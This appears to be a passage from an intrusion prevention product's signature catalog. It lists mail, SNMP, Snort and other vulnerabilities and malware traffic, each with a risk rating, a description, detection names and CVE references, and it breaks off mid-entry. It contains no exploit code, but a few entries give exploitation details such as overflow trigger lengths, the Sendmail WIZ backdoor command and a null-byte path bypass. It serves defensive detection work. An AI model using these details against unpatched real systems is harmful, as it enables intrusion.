sgpkg-ips-83-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

QK SMTP Server

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in QK SMTP Server. The vulnerability allows a remote attacker to cause a DoS or compromise the vulnerable system.

Situation:

E-Mail_HCS-Mail-Hdr-Sendmail-Header-BOF

References:

CVE-2006-5551
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5551

BID-20681
http://www.securityfocus.com/bid/20681

SMTP-RCPT-To-Decode

About this vulnerability:

SMTP Rcpt To Decode

Risk:

High

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

Sendmail

Type:

Metacharacter

Description:

Old Sendmail versions allow forwarding e-mail to the uudecode program. This can be exploited to overwrite arbitrary files with arbitrary content. This can lead to a remote root compromise.

Situation:

SMTP_RCPT-To-Decode

References:

CVE-1999-0203
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0203

SMTP-RCPT-To-File

About this vulnerability:

SMTP Rcpt to file

Risk:

High

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

Sendmail

Type:

Metacharacter

Description:

In old sendmail versions if was possible to send mail directly into a file. This will enable a remote intruder to gain remote root access on the system.

Situation:

SMTP_RCPT-To-File

References:

CVE-1999-0203
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0203

SMTP-Sendmail-Header-BOF

About this vulnerability:

Sendmail header parsing vulnerability

Risk:

High

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Sendmail

Type:

Buffer Overflow

Description:

Sendmail contains a buffer overflow error in the header parsing functionality which can allow the attacker to gain elevated system privileges on the victim host.

Situation:

References:

CVE-2002-1337
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1337

BID-6991
http://www.securityfocus.com/bid/6991

SMTP-Sendmail-Helo-Hide-Sender-BOF

About this vulnerability:

Sendmail HELO command buffer overflow

Risk:

Low

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

Sendmail

Type:

Buffer Overflow

Description:

Some Sendmail versions have a buffer overflow vulnerability in HELO argument processing that causes loss of the mail sender information. This can be exploited to hide the mail sender.

Situation:

SMTP_Sendmail-Timeout-Race-Condition

References:

CVE-1999-0098
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0098

SMTP-Sendmail-Nochar-BOF

About this vulnerability:

NOCHAR buffer-overflow vulnerability in sendmail

Risk:

Moderate

First detected in:

sgpkg-ips-2-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Sendmail

Type:

Malfunction

Description:

Sendmail versions prior to 8.12.8 are vulnerable to a buffer-overflow exploit. Due to a programming error conversions between characters and integers are not handled correctly, which allows remote attackers to cause a denial of service and possibly execute arbitrary code as root.

Situation:

SMTP_Sendmail-Nochar-BOF

References:

CVE-2003-0161
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0161

BID-7230
http://www.securityfocus.com/bid/7230

SMTP-Sendmail-Prescan-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in Sendmail prescan function

Risk:

Moderate

First detected in:

sgpkg-ips-155-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Sendmail

Type:

Buffer Overflow

Description:

Sendmail versions prior to 8.12.9 suffer from a buffer overflow vulnerability due to an error in the prescan function. A successful attack allows remote attackers to execute arbitrary code on a vulnerable system.

Situation:

SMTP_Sendmail-Nochar-BOF

References:

CVE-2003-0694
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0694

SMTP-Sendmail-Timeout-Buffer-Overflow

About this vulnerability:

Sendmail buffer overflow vulnerability related to a race condition in session timeouts

Risk:

High

First detected in:

sgpkg-ips-62-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

Sendmail

Type:

Buffer Overflow

Description:

Sendmail has a vulnerability relating to SMTP message timeouts. Sendmail defines time limits for clients to transfer e-mail messages (by default one hour to tranfer the message body). There is a race condition in the handling of the message timemouts, and associated integer overflows which possibly allow arbitrary code execution with a specially crafted SMTP session.

Situation:

References:

CVE-2006-0058
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0058

BID-17192
http://www.securityfocus.com/bid/17192

OSVDB-24037
http://www.osvdb.org/24037

SMTP-Server-HELP-Command-Buffer-Overflow

About this vulnerability:

A vulnerability in Chameleon SMTPd

Risk:

High

First detected in:

sgpkg-ips-333-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

NetManage Chameleon

Type:

Buffer Overflow

Description:

There exists buffer overflow vulnerabilities in the NetManage Chameleon SMTPd. Exploitation of these vulnerabilities may lead into service crash or remote compromise.

Situation:

SMTP_Help-Overflow

References:

CVE-1999-0261
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0261

BID-33560
http://www.securityfocus.com/bid/33560

SMTP-SpamAssassin-Malformed-Email-Header-DoS

About this vulnerability:

SpamAssassin malformed email header denial of service vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-65-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

SpamAssassin

Type:

Resource Starvation

Description:

Apache SpamAssassin 3.0.3 and prior has a denial of service vulnerability. A remote attacker can exploit this vulnerability by sending an SMTP message, or to enforce the outcome multiple SMTP messages, with a crafted "Content-Type" header field to the target server, which can consume 100 % of the server's CPU resources causing a temporary denial of service condition.

Situation:

E-Mail_HCS-SpamAssassin-Malformed-Email-Header-DoS

References:

CVE-2005-1266
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1266

BID-13978
http://www.securityfocus.com/bid/13978

OSVDB-17346
http://www.osvdb.org/17346

SMTP-SquirrelMail-Content-Type-Header-Cross-Site-Scripting

About this vulnerability:

A vulnerability in SquirrelMail allows cross site scripting

Risk:

Low

First detected in:

sgpkg-ips-91-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

SquirrelMail

Type:

Cross-site Scripting

Description:

There is a cross site scripting vulnerability in SquirrelMail. A crafted Content-Type header can be used to execute JavaScript in the context of the SquirrelMail session. This may lead to information forgery.

Situation:

E-Mail_HCS-SquirrelMail-Content-Type-Header-Cross-Site-Scripting

References:

CVE-2004-0520
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0520

BID-10439
http://www.securityfocus.com/bid/10439

SMTP-Src-Helo-BOF

About this vulnerability:

SMTP Src Helo BOF

Risk:

High

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Silent Runner Collector (SRC)

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability that can be exploited by sending a long argument in HELO command.

Situation:

References:

CVE-2001-0397
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0397

SMTP-VirusWall-Helo-BOF

About this vulnerability:

SMTP VirusWall Helo BOF

Risk:

High

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows NT

Software:

InterScan VirusWall

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability that can be exploited by sending a long argument in HELO command.

Situation:

References:

CVE-1999-1529
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1529

BID-787
http://www.securityfocus.com/bid/787

SMTP-Winsmtp-Helo-BOF

About this vulnerability:

SMTP Winsmtp Helo BOF

Risk:

Low

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

WinSMTP

Type:

Buffer Overflow

Description:

WinSMTP contains a buffer overflow vulnerability that can be exploited by sending a long argument in HELO command. An argument of 170 bytes or more triggers the overflow.

Situation:

References:

CVE-2000-0833
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0833

BID-1680
http://www.securityfocus.com/bid/1680

SMTP-Wiz-Backdoor

About this vulnerability:

SMTP WIZ Backdoor

Risk:

Low

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

Sendmail

Type:

Backdoor

Description:

Very old versions of sendmail contain a backdoor, mistakenly left there by some developer. In current versions this backdoor is of course removed. This backdoor can be accessed via command WIZ.

Situation:

SMTP_Wiz-Detect

References:

CVE-1999-0145
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0145

SMTP-Xtramail-Helo-BOF

About this vulnerability:

SMTP Xtramail Helo BOF

Risk:

Low

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Artisoft XtraMail

Type:

Buffer Overflow

Description:

Artisoft XtraMail contains a buffer overflow vulnerability that can be exploited by sending a long argument in HELO command. An argument of 10000 bytes or more triggers the overflow.

Situation:

SMTP_Citadel-SMTP-RCPT-To-Buffer-Overflow
SMTP_RCPT-To-BOF

References:

CVE-1999-1511
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1511

BID-791
http://www.securityfocus.com/bid/791

SMTP_Citadel-SMTP-RCPT-To-Remote-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in Citadel SMTP server

Risk:

High

First detected in:

sgpkg-ips-140-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

Citadel Server

Type:

Buffer Overflow

Description:

There exists a buffer overflow vulnerability in Citadel SMTP Server. The vulnerability is due to insufficient boundary check when processing user provided data. Remote attackers could exploit this vulnerability by supplying a specially crafted RCPT TO command to the server. Successful exploitation of this vulnerability allows remote attackers execute arbitrary code with the privileges of the affected application.

Situation:

References:

CVE-2008-0394
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0394

BID-27376
http://www.securityfocus.com/bid/27376

Snake-Keylogger-Infection-Traffic

About this vulnerability:	Snake Keylogger infection traffic was detected
Risk:	High
First detected in:	sgpkg-ips-1377-5242
Last changed:	sgpkg-ips-1377-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Snake Keylogger infection traffic was detected.
Situation:	SMTP_CS-Snake-Keylogger-Infection-Traffic FTP_CS-Snake-Keylogger-Infection-Traffic

SnakeYaml-Constructor-Insecure-Deserialization-CVE-2022-1471

About this vulnerability:

An attempt to exploit a vulnerability in SnakeYaml detected

Risk:

High

First detected in:

sgpkg-ips-1663-5242

Last changed:

sgpkg-ips-1665-5242

Platform:

Generic

Software:

SnakeYaml

Type:

Input Validation

Description:

SnakeYaml's constructor class does not restrict types which can be instantiated during deserialization. Deserializing yaml content provided by an attacker can lead to remote code execution. SnakeYaml's SafeConsturctor, on the other hand, is not vulnerable.

Situation:

File-Text_SnakeYaml-Constructor-Insecure-Deserialization-CVE-2022-1471
File-Text_Potential-SnakeYaml-Constructor-Insecure-Deserialization-CVE-2022-1471
File-TextId_SnakeYaml-Constructor-Insecure-Deserialization-CVE-2022-1471

References:

CVE-2022-1471
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1471

Snap-Creek-Duplicator-Wordpress-Plugin-Code-Injection

About this vulnerability:

A vulnerability in Snap Creek Duplicator

Risk:

High

First detected in:

sgpkg-ips-1151-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Snap Creek Duplicator

Type:

Code Injection

Description:

A vulnerability in Snap Creek Duplicator WordPress plugin, versions <= 1.2.40, which allows remote attackers to execute arbitrary PHP code by allowing anyone to call a function that can overwrite the wp-config.php file, due to improper sanitization of the POST parameters.

Situation:

HTTP_CSU-Snap-Creek-Duplicator-Wordpress-Plugin-Code-Injection

References:

CVE-2018-17207
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17207

SNIProxy-New_address-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in SNIProxy

Risk:

Moderate

First detected in:

sgpkg-ips-1608-5242

Last changed:

sgpkg-ips-1608-5242

Platform:

Generic

Software:

SNIProxy

Type:

Buffer Overflow

Description:

A stack buffer overflow vulnerability has been reported for SNIProxy. The vulnerability is due to lack of proper validation of the length of the Host header or SNI data prior to copying it to a fixed-length stack buffer. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted HTTP or TLS packet to the vulnerable server. Successful exploitation could result in execution of arbitrary code in the security context of the vulnerable service.

Situation:

TLS-SNI_SNIProxy-New_address-Stack-Buffer-Overflow
HTTP_CSH-SNIProxy-New_address-Stack-Buffer-Overflow

References:

CVE-2023-25076
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-25076

SNMP-Castle-Rock-Computing-SNMPc-Network-Manager-Community-String-BOF

About this vulnerability:

Buffer overflow vulnerability in Castle Rock Computing SNMPc Network Manager

Risk:

High

First detected in:

sgpkg-ips-153-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Castle Rock Computing SNMPc Network Manager

Type:

Buffer Overflow

Description:

Castle Rock Computing SNMPc Network Manager has a buffer overflow vulnerability in the handling of the community string in the SNMP Trap message. Exploiting this issue allows an attacker to cause a denial of service condition or compromise the vulnerable system.

Situation:

SNMP-UDP_Castle-Rock-Computing-SNMPc-Network-Manager-Community-String-BOF

References:

CVE-2008-2214
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2214

BID-28990
http://www.securityfocus.com/bid/28990

OSVDB-44885
http://www.osvdb.org/44885

SNMP-Common-Unix-Printing-System-ASN1-BOF

About this vulnerability:

Common UNIX Printing System SNMP ASN1 Remote Buffer Overflow Vulnerability

Risk:

High

First detected in:

sgpkg-ips-140-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Common UNIX Printing System

Type:

Buffer Overflow

Description:

Common UNIX Printing System (CUPS) has a remote buffer-overflow vulnerability in its SNMP management code. Exploiting this issue allows attackers to execute arbitrary machine code in the context of users running the affected software. Failed exploit attempts will likely result in denial-of-service conditions.

Situation:

SNMP-UDP_CUPS-BOF

References:

CVE-2007-5849
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5849

BID-26917
http://www.securityfocus.com/bid/26917

SNMP-Default-Community-String-Usage

About this vulnerability:

Usage of default community string in SNMP

Risk:

Moderate

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

SNMP Agent

Type:

Insecure Configuration

Description:

Some SNMP systems may use the default community strings. An attacker could get access to sensitive information on the target machine by using these known community strings.

Situation:

SNMP-UDP_Write-Attempt-Using-Default-Community-String
SNMP-UDP_Default-Community-String-Accepted
SNMP-UDP_Default-Community-String-Rejected
SNMP-UDP_Default-Community-String-Public-Accepted

References:

CVE-1999-0517
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0517

SNMP-Default-Community-String-WINS-DoS

About this vulnerability:

WINS Database records can be deleted via SNMP

Risk:

Moderate

First detected in:

sgpkg-ips-9-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows NT 4.0

Software:

<os>

Type:

Insecure Configuration

Description:

All records in a WINS database can be deleted through SNMP using default community strings for a denial of service. Vulnerability is known to exist in some versions of Windows NT 4. It is patched in SP6.

Situation:

SNMP-UDP_WINS-Delete-DoS

References:

CVE-1999-0294
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0294

BID-2244
http://www.securityfocus.com/bid/2244

OSVDB-3114
http://www.osvdb.org/3114

SNMP-Linux-Kernel-SNMP-NAT-Helper-SNMP-Trap-Decode-DoS

About this vulnerability:

Denial of service vulnerability in Linux kernel SNMP handling code

Risk:

Moderate

First detected in:

sgpkg-ips-113-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

<os>

Type:

Malfunction

Description:

The SNMP NAT helper for Linux kernels before 2.6.16.18 suffers from a vulnerability that allows remote attackers to cause a denial of service via a crafted SNMP packet.

Situation:

SNMP-UDP_Linux-Kernel-SNMP-NAT-Helper-SNMP-Trap-Decode-DoS

References:

CVE-2006-2444
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2444

BID-18081
http://www.securityfocus.com/bid/18081

OSVDB-25750
http://www.osvdb.org/25750

SNMP-Microsoft-SNMP-Service-Buffer-Overflow

About this vulnerability:

Microsoft SNMP Service contains suffers buffer overflow

Risk:

Moderate

First detected in:

sgpkg-ips-87-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000; Windows XP; Windows 2003

Software:

<os>

Type:

Buffer Overflow

Description:

There is a remote code execution vulnerability in Microsoft SNMP service. The vulnarability is caused by the insufficient validation of certain certain parameters of the SNMP request.

Situation:

SNMP-UDP_Microsoft-SNMP-Service-Buffer-Overflow
SNMP-UDP_GetBulkRequest-With-Nonzero-Nonrepeaters-And-Maxrepeaters-Values
SNMP-UDP_GetBulkRequest-With-Nonzero-Nonrepeaters-And-Large-Maxrepeaters-Value

References:

CVE-2006-5583
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5583

BID-21537
http://www.securityfocus.com/bid/21537

MS06-074
http://technet.microsoft.com/security/bulletin/MS06-074

SNMP-Nodemanager-SNMP-Trap-Buffer-Overflow

About this vulnerability:

Nodemanager Professional stack overflow vulnerability

Risk:

High

First detected in:

sgpkg-ips-29-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

NodeManager Professional

Type:

Buffer Overflow

Description:

Nodemanager Professional displays and logs SNMP traps. While the trap packets are parsed, their values are copied into a 512-byte buffer without checking the size of the value. This allows remote attackers to execute arbitrary code on the machine that runs Nodemanager by sending a malicious SNMP trap packet to overflow the buffer.

Situation:

SNMP-UDP_Nodemanager-SNMP-Trap-Buffer-Overflow

References:

CVE-2005-0185
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0185

BID-12283
http://www.securityfocus.com/bid/12283

SNMP-Trap-Service-GET-Request-DoS

About this vulnerability:

A denial of service vulnerability in SNMP trap handling.

Risk:

High

First detected in:

sgpkg-ips-668-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

SNMP Trap

Type:

Malfunction

Description:

A denial of service vulnerability in many versions of SNMP implementations which allow remote attackers to cause a denial of service or gain privileges and compromise the system via SNMPv1 trap handling.

Situation:

SNMP-UDP_SNMP-Trap-Service-GET-Request-DoS

References:

CVE-2002-0012
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0012

BID-4088
http://www.securityfocus.com/bid/4088

OSVDB-810
http://www.osvdb.org/810

MS02-006
http://technet.microsoft.com/security/bulletin/MS02-006

Snort-Back-Orifice-Pre-Processor-Buffer-Overflow

About this vulnerability:

A vulnerability in Snort Project Snort

Risk:

Moderate

First detected in:

sgpkg-ips-435-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Snort

Type:

Malfunction

Description:

There is a buffer overflow vulnerability in Snort. The flaw is caused by insufficient boundary checks in the handling of Back Orifice messages. An attacker may leverage this vulnerability to execute arbitrary code in the security context of the affected product, normally root. In a successful attack, where an attacker injects code into the vulnerable target, the behaviour of the target host is dependent on the intention of the malicious code. If such an attack is not executed successfully, the vulnerable application may terminate as a result of the attack attempt. Note that any code executed by the attacker runs with the privileges of the affected product, normally root on Unix-like systems.

Situation:

Generic_UDP-Snort-Back-Orifice-Pre-Processor-Buffer-Overflow

References:

CVE-2005-3252
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3252

BID-15131
http://www.securityfocus.com/bid/15131

OSVDB-20034
http://www.osvdb.org/20034

Snort-DCE/RPC-Preprocessor-Stack-Based-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in the Snort DCE/RPC preprocessor.

Risk:

High

First detected in:

sgpkg-ips-665-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows; Linux

Software:

Snort

Type:

Buffer Overflow

Description:

A stack based buffer overflow vulnerability in the Snort DCE/RPC preprocessor, versions before 2.6.1.3 and 2.7 before beta 2, which allows remote attackers to execute arbitrary code via crafted SMB traffic.

Situation:

SMB-TCP_-Snort-DCE/RPC-Preprocessor-Stack-Based-Buffer-Overflow

References:

CVE-2006-5276
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5276

BID-22616
http://www.securityfocus.com/bid/22616

OSVDB-32094
http://www.osvdb.org/32094

Snort-frag3-Preprocessor-Fragmented-IP-Packet-Detection-Evasion

About this vulnerability:

A Snort frag3 Preprocessor Fragmented IP Packet Detection Evasion vulnerability

Risk:

High

First detected in:

sgpkg-ips-1001-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Snort

Type:

Malfunction

Description:

A vulnerability in Snort Intrusion Detection System which allows remote attackers to evade security due to the improper processing of fragmented IP packets, as the frag3 preprocessor does not check for ip_option_length bytes at the end of the IP options when reassembling the fragmented packets.

Situation:

Generic_UDP-Snort-frag3-Preprocessor-Fragmented-IP-Packet-Detection-Evasion

References:

CVE-2006-0839
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0839

SoapUI-WSDL-Remote-Code-Execution-CVE-2014-1202

About this vulnerability:

A vulnerability in SoapUI

Risk:

High

First detected in:

sgpkg-ips-1866-5242

Last changed:

sgpkg-ips-1866-5242

Platform:

Generic

Software:

SoapUI

Type:

Input Validation

Description:

A vulnerability in SoapUI versions before 4.6.4 allows a remote attacker to execute arbitrary Java code by enticing the target user into opening a maliciously crafted WSDL file.

Situation:

File-TextId_SoapUI-WSDL-Remote-Code-Execution-CVE-2014-1202

References:

CVE-2014-1202
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1202

SocGholish-Framework-Activity

About this vulnerability:	SocGholish framework activity was detected
Risk:	High
First detected in:	sgpkg-ips-1270-5242
Last changed:	sgpkg-ips-1536-5242
Platform:	Windows
Software:	<os>
Type:	Javascript Injection
Description:	SocGholish is a malicious Javascript framework. It typically masquerades as a browser update download and is used to distribute malware.
Situation:	HTTP_CSU-SocGholish-Framework-HTTP-Request File-Text_SocGholish-Framework-Injected-Script File-Text_SocGholish-Zip-File

SOCKS4-Protocol

About this vulnerability:	SOCKS4 protocol
Risk:	Low
First detected in:	sgpkg-ips-322-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Any Operating System
Software:	<os>
Type:	Browser
Description:	SOCKS4 is a protocol that enables the routing of network packets between client-server applications via a proxy server.
Situation:	Shared_TCP-CS-SOCKS4-Connection-Request Shared_SS-SOCKS4-Connection-Request-Accepted Shared_SS-SOCKS4-Connection-Request-Failed

SOCKS5-Protocol

About this vulnerability:	SOCKS5 protocol
Risk:	Low
First detected in:	sgpkg-ips-322-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Any Operating System
Software:	<os>
Type:	Browser
Description:	SOCKS5 is a protocol that enables the routing of network packets between client-server applications via a proxy server.
Situation:	Shared_TCP-CS-SOCKS5-Connection-Request Shared_SS-SOCKS5-Connection-Request-Accepted Shared_SS-SOCKS5-Connection-Request-Failed

Soda-PDF-Insecure-Library-Loading

About this vulnerability:

A vulnerability in LULU Software Soda PDF

Risk:

Moderate

First detected in:

sgpkg-ips-544-5211

Last changed:

sgpkg-ips-1640-5242

Platform:

Generic

Software:

LULU Software Soda PDF

Type:

Malfunction

Description:

There is a code execution vulnerability in Soda PDF. The vulnerability is due to an improper dynamic link library (DLL) search path leading to insecure library loading. A remote attacker could exploit this vulnerability by enticing a user to process a PDF file from a malicious source. A successful attack would result in execution of arbitrary code in the security context of the affected application.

Situation:

HTTP_CSU-Insecure-Microsoft-Library-Loading
SMB-TCP_CHS_Soda-PDF-Insecure-Library-Loading

References:

CVE-2013-3485
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3485

OSVDB-96228
http://www.osvdb.org/96228

SoftiaCom-WMailserver-Buffer-Overflow

About this vulnerability:

A SoftiaCom WMailserver Buffer Overflow vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-735-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

SoftiaCom WMailserver

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in SoftiaCom WMailserver, versions 1.0 and 2.0, which allows remote attackers to execute arbitrary code via a long TCP packet with a leading space.

Situation:

SMTP_CS-SoftiaCom-WMailserver-Buffer-Overflow

References:

CVE-2005-2287
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2287

BID-14213
http://www.securityfocus.com/bid/14213

OSVDB-17883
http://www.osvdb.org/17883

Softing-Edgeaggregator-Restore-Configuration-Directory-Traversal

About this vulnerability:

A vulnerability in Softing edgeAggregator

Risk:

High

First detected in:

sgpkg-ips-1625-5242

Last changed:

sgpkg-ips-1625-5242

Platform:

Generic

Software:

Softing edgeAggregator

Type:

Directory Traversal

Description:

A directory traversal vulnerability exists in Softing edgeAggregator. The vulnerability is due to improper validation of user data used in file paths in the backup/restore operation. A remote, authenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary write access to the server which, in the worst case, can be utilized to achieve arbitrary code execution under the security context of root.

Situation:

File-Member-Name_Softing-Edgeaggregator-Restore-Configuration-Directory-Traversal

References:

CVE-2023-38126
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38126

Softing-Secure-Integration-Server-v1.22-RCE

About this vulnerability:

An attempt to exploit a vulnerability in Softing Secure Integration Server detected

Risk:

High

First detected in:

sgpkg-ips-1769-5242

Last changed:

sgpkg-ips-1769-5242

Platform:

Windows

Software:

Softing Secure Integration Server

Type:

Directory Traversal

Description:

A vulnerability in Softing Secure Integration Server, version v1.22, which allows remote attackers to execute arbitrary commands by uploading a malicious config zip file which contains a directory traversal.

Situation:

File-Zip_Softing-Secure-Integration-Server-v1.22-RCE

References:

CVE-2022-1373
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1373

Softmaker-Office-Planmaker-Excel-Sst-Record-Buffer-Overflow

About this vulnerability:

A vulnerability in SoftMaker Office PlanMaker

Risk:

Moderate

First detected in:

sgpkg-ips-1323-5242

Last changed:

sgpkg-ips-1323-5242

Platform:

Generic

Software:

SoftMaker Office PlanMaker

Type:

Malfunction

Description:

Improper handling of the RecordDataLength field in SST records of OLE files causes a buffer overflow vulnerability in SoftMaker Office Planmaker. A successful exploit may allow an attacker to execute arbitrary code on the target system with the privileges of the vulnerable application.

Situation:

File-OLE_Softmaker-Office-Planmaker-Excel-Sst-Record-Buffer-Overflow

References:

CVE-2020-13586
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13586

Softmaker-Office-Planmaker-Pmd-Document-0x8010-Record-Out-Of-Bounds-Write

About this vulnerability:

A vulnerability in SoftMaker Office PlanMaker

Risk:

Moderate

First detected in:

sgpkg-ips-1523-5242

Last changed:

sgpkg-ips-1523-5242

Platform:

Generic

Software:

SoftMaker Office PlanMaker

Type:

Malfunction

Description:

An out of bounds write vulnerability has been reported in SoftMaker Office PlanMaker. The vulnerability is due to improper handling of the 0x8010 records in PMD documents. A remote, unauthenticated attacker can exploit this vulnerability by enticing an user to open a crafted file. Successful exploitation results in arbitrary code execution in security context of the application.

Situation:

File-OLE_Softmaker-Office-Planmaker-Pmd-Document-0x8010-Record-Out-Of-Bounds-Write

References:

CVE-2020-13580
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13580

Softmaker-Office-Planmaker-Pmd-Document-Records-Integer-Overflow

About this vulnerability:

A vulnerability in SoftMaker Office PlanMaker

Risk:

Moderate

First detected in:

sgpkg-ips-1324-5242

Last changed:

sgpkg-ips-1324-5242

Platform:

Generic

Software:

SoftMaker Office PlanMaker

Type:

Integer Overflow

Description:

Improper handling of 0x8011 and 0x820A records in PMD documents causes an integer overflow vulnerability in SoftMaker Office PlanMaker. A successful exploit may allow an attacker to execute arbitrary code with the privileges of the affected application.

Situation:

File-OLE_Softmaker-Office-Planmaker-Pmd-Document-Records-Integer-Overflow

References:

CVE-2020-13579
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13579

SOHO-Router-Products-Cookie-Parsing-Authentication-Bypass

About this vulnerability:

A vulnerability in Small Office Home Office (SOHO) Router Devices containing an old version of AllegroSoft ROMPager embedded webserver

Risk:

High

First detected in:

sgpkg-ips-622-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

<os>

Type:

Input Validation

Description:

An authentication bypass vulnerability exists when parsing HTTP cookies in multiple Small Office Home Office (SOHO) Router Devices containing an old version of AllegroSoft ROMPager embedded webserver. A patch for this vulnerability was created in 2005 by AllegroSoft, but many devices embedding this software have not been updated or do not have updated firmware available. This vulnerability has been branded "Misfortune Cookie".

Situation:

HTTP_CS-SOHO-Router-Products-Cookie-Parsing-Authentication-Bypass

References:

CVE-2014-9222
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9222

Sojourn-File-Disclosure

About this vulnerability:

sojourn.cgi file disclosure

Risk:

Moderate

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1639-5242

Platform:

Generic

Software:

Sojourn

Type:

Directory Traversal

Description:

The sojourn.cgi script allows reading the contents of any file on the system by requesting for a category. The appended '.txt' can be bypassed with a '%00' and the script does not restrict itself to the Web server's root directory nor to the allowed categories on the server.

Situation:

HTTP_CS-Solaris-Answerbook2-Format-Strings-Vulnerability

References:

CVE-2000-0180
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0180

BID-1052
http://www.securityfocus.com/bid/1052

Solaris-Answerbook2-Format-Strings-Vulnerability

About this vulnerability:

Format strings vulnerability in Answerbook2 http server

Risk:

High

First detected in:

sgpkg-ips-102-1314

Last changed:

sgpkg-ips-1589-5242

Platform:

Solaris

Software:

<os>

Type:

Format String

Description:

